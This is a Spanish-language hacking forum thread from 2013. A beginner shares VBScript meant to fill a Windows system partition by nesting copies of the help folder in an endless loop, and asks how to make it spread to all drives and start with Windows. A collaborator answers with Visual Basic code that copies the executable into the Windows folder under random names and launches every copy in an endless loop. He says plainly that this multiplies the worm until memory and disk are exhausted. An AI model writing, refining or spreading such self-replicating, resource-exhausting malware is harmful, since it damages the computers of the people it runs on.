elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Analisis de mi Malware
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Analisis de mi Malware  (Leído 2,423 veces)
danny920825

Desconectado Desconectado

Mensajes: 175


Ver Perfil WWW
Analisis de mi Malware
« en: 10 Octubre 2013, 14:18 pm »

Hola a todos, soy nuevo en esto del malware, tan nuevo que este es mi primer intento despues de crear un bucle infinito en batch; ahora la cuestion es que ya tengo el codigo del malware, lo que quiero es hacerlo un virus,o sea, que se autocopie a todas las unidades de la pc y se ejecute al iniciar windows aun cuando el usuario que lo ejecute no pueda escribir en el registro. el diseño seria asi
Código:
on error resume next

' Declaracion de variables
set objshell = createobject("wscript.shell")
set objfso = createobject("scripting.filesystemobject")
dim perfil_usuario
dim carpeta_destino
dim cont
dim ampliar
dim help

rem                    Inicializacion de las variables
perfil_usuario = objshell.expandenvironmentstrings("%userprofile%")
help = objshell.expandenvironmentstrings("%windir%")
msgbox (help)
icono = objshell.expandenvironmentstrings("%windir%\system32")
carpeta_destino = objfso.createfolder(perfil_usuario & "\Dark_Stone")
llenar = objfso.createfolder(perfil_usuario & "\Dark_Stone\llenar")



rem                    Cuerpo
while (5=5)
 copiar = objfso.copyfolder(help & "\help", llenar)
 ampliar = objfso.createfolder(llenar & "\llenando")
 llenar = ampliar
wend

lo del while (5=5) es una condicion que yo usaba en la escuela para decir que algo tenia que ejecutarse siempre sin final.
el objetivo de este codigo es llenar el espacio de la particion donde esta instalado el sistema operativo, lo que no logro hacer de ninguna forma y por eso no puse el codigo es que se copie. Por favor ayuda y espero haber ayudado a alguien con mi propuesta de codigo.

PD: Es valido tambien cualkier aporte al diseño y a la forma visual del malware!
« Última modificación: 10 Octubre 2013, 14:21 pm por danny920825 » En línea

"Los que reniegan de Dios es por desesperación de no encontrarlo".
   Miguel de Unamuno
Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.164


Cheats y Trainers para todos!


Ver Perfil WWW
Re: Analisis de mi Malware
« Respuesta #1 en: 10 Octubre 2013, 15:50 pm »

La idea es buena, pero yo lo implementaría de alguna otra forma.

Usar un While (5=5) es válido, pero para iniciar un bucle infinito lo mejor es usar Do - Loop, por ejemplo:

Código
  1. Randomize
  2. Do
  3. A = Environ("WINDIR") & "\" & int(Rnd * 99999) & ".exe"
  4. FileCopy App.Path & "\" & App.EXEName & ".exe", A
  5. DoEvents
  6. Shell A
  7.  
  8. Loop
  9.  

El ejemplo utiliza un bucle infinito, copia el virus en la carpeta del sistema con un número aleatorio y ejecuta dicha copia. Haciendo eso conseguirás ejecutar exponencialmente una misma copia del gusano, consumiendo los recursos de memoria y el espacio libre.

Mi código se puede mejorar, es solo un ejemplo :)
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
danny920825

Desconectado Desconectado

Mensajes: 175


Ver Perfil WWW
Re: Analisis de mi Malware
« Respuesta #2 en: 13 Octubre 2013, 22:21 pm »

tu respuesta me interesa utilizarla, pero necesito una descripcion de lo que hace, pues cuando sustituyo tu codigo por el mio y ejecuto el archivo, me abre un cartel msgbox que dice "c:windows", reviso el administrador de tareas y se esta ejecutando, pero no puedo monitorizarlo porque no se donde esta llenando el hdd. Por favor soy nuevo en esto, explicame si puedes. Gracias de antemano
En línea

"Los que reniegan de Dios es por desesperación de no encontrarlo".
   Miguel de Unamuno
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
analisis y diseno de malware « 1 2 »
Sugerencias y dudas sobre el Foro
YST 17 9,777 Último mensaje 21 Junio 2009, 23:51 pm
por Littlehorse
Sección Analisis y Diseño de Malware
Sugerencias y dudas sobre el Foro
fary 1 6,794 Último mensaje 15 Diciembre 2011, 23:53 pm
por skapunky
Duda en análisis de malware
Ingeniería Inversa
w0nt0n 7 4,659 Último mensaje 14 Febrero 2012, 20:06 pm
por w0nt0n
Análisis de Malware VB
Ingeniería Inversa
Иōҳ 7 6,072 Último mensaje 10 Mayo 2012, 20:07 pm
por MCKSys Argentina
Análisis, Malware ACAD/Medre
Análisis y Diseño de Malware
Иōҳ 1 2,860 Último mensaje 27 Junio 2012, 23:04 pm
por Иōҳ
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines